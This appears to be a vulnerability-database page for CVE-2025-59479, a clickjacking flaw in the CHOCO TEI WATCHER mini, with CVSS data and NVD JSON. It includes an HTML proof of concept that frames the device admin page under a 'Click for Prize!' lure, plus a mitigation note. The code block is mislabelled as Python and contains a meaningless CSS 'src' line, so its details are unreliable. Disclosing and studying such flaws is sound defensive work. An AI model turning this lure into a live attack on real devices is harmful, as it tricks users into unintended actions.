Security Vulnerability Report
中文
CVE-2025-59479 CVSS 6.1 MEDIUM

CVE-2025-59479

Published: 2025-12-16 05:16:13
Last Modified: 2025-12-23 21:46:53

Description

CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper restriction of rendered UI layers or frames. If a user clicks on content on a malicious web page while logged into the product, unintended operations may be performed on the product.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:inaba:ib-mct001_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:inaba:ib-mct001:-:*:*:*:*:*:*:* - NOT VULNERABLE
CHOCO TEI WATCHER mini (IB-MCT001) - 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-59479 PoC: Clickjacking Attack on CHOCO TEI WATCHER mini --> <!DOCTYPE html> <html> <head> <title>Malicious Page - CVE-2025-59479</title> <style> body { margin: 0; padding: 20px; font-family: Arial, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; } .container { max-width: 800px; margin: 50px auto; background: white; padding: 30px; border-radius: 10px; box-shadow: 0 10px 30px rgba(0,0,0,0.3); } /* Invisible iframe containing the vulnerable device page */ .iframe-container { position: relative; width: 100%; height: 600px; border: 2px solid #333; border-radius: 5px; overflow: hidden; } iframe { width: 100%; height: 100%; border: none; /* Load the device management interface */ src: "http://<device-ip>/"; } /* Hidden malicious button overlay */ .malicious-overlay { position: absolute; top: 150px; left: 50%; transform: translateX(-50%); width: 200px; height: 50px; background: transparent; cursor: pointer; z-index: 999; /* Button positioned over device's admin button */ } .malicious-overlay::after { content: "Click for Prize!"; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: rgba(255, 215, 0, 0.8); border-radius: 25px; display: flex; align-items: center; justify-content: center; font-weight: bold; color: #333; box-shadow: 0 4px 15px rgba(0,0,0,0.3); } /* Decoy content to lure user */ .decoy-text { text-align: center; margin-bottom: 20px; } .warning { background: #fff3cd; border: 1px solid #ffc107; padding: 15px; border-radius: 5px; margin-top: 20px; } .warning h3 { margin-top: 0; color: #856404; } </style> </head> <body> <div class="container"> <div class="decoy-text"> <h1>Congratulations! You've Won!</h1> <p>Click the golden button below to claim your prize.</p> <p><em>(Actually triggers hidden action on device)</em></p> </div> <div class="iframe-container"> <!-- Device management page loaded in iframe --> <iframe src="http://<device-ip>/" sandbox="allow-same-origin allow-scripts"></iframe> <!-- Malicious overlay button --> <div class="malicious-overlay" onclick="alert('Hidden action executed!')"></div> </div> <div class="warning"> <h3>⚠️ Security Note</h3> <p>This is a demonstration of CVE-2025-59479. The device should implement X-Frame-Options: DENY or Content-Security-Policy: frame-ancestors 'none' to prevent clickjacking attacks.</p> </div> </div> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59479", "sourceIdentifier": "[email protected]", "published": "2025-12-16T05:16:13.097", "lastModified": "2025-12-23T21:46:53.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper restriction of rendered UI layers or frames. If a user clicks on content on a malicious web page while logged into the product, unintended operations may be performed on the product."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:inaba:ib-mct001_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E4D0CBD2-40BA-499A-989F-4CA133E0294F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:inaba:ib-mct001:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DF4FF0F-BA64-498E-ABD5-951AEF9A9627"}]}]}], "references": [{"url": "https://jvn.jp/en/vu/JVNVU92827367/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}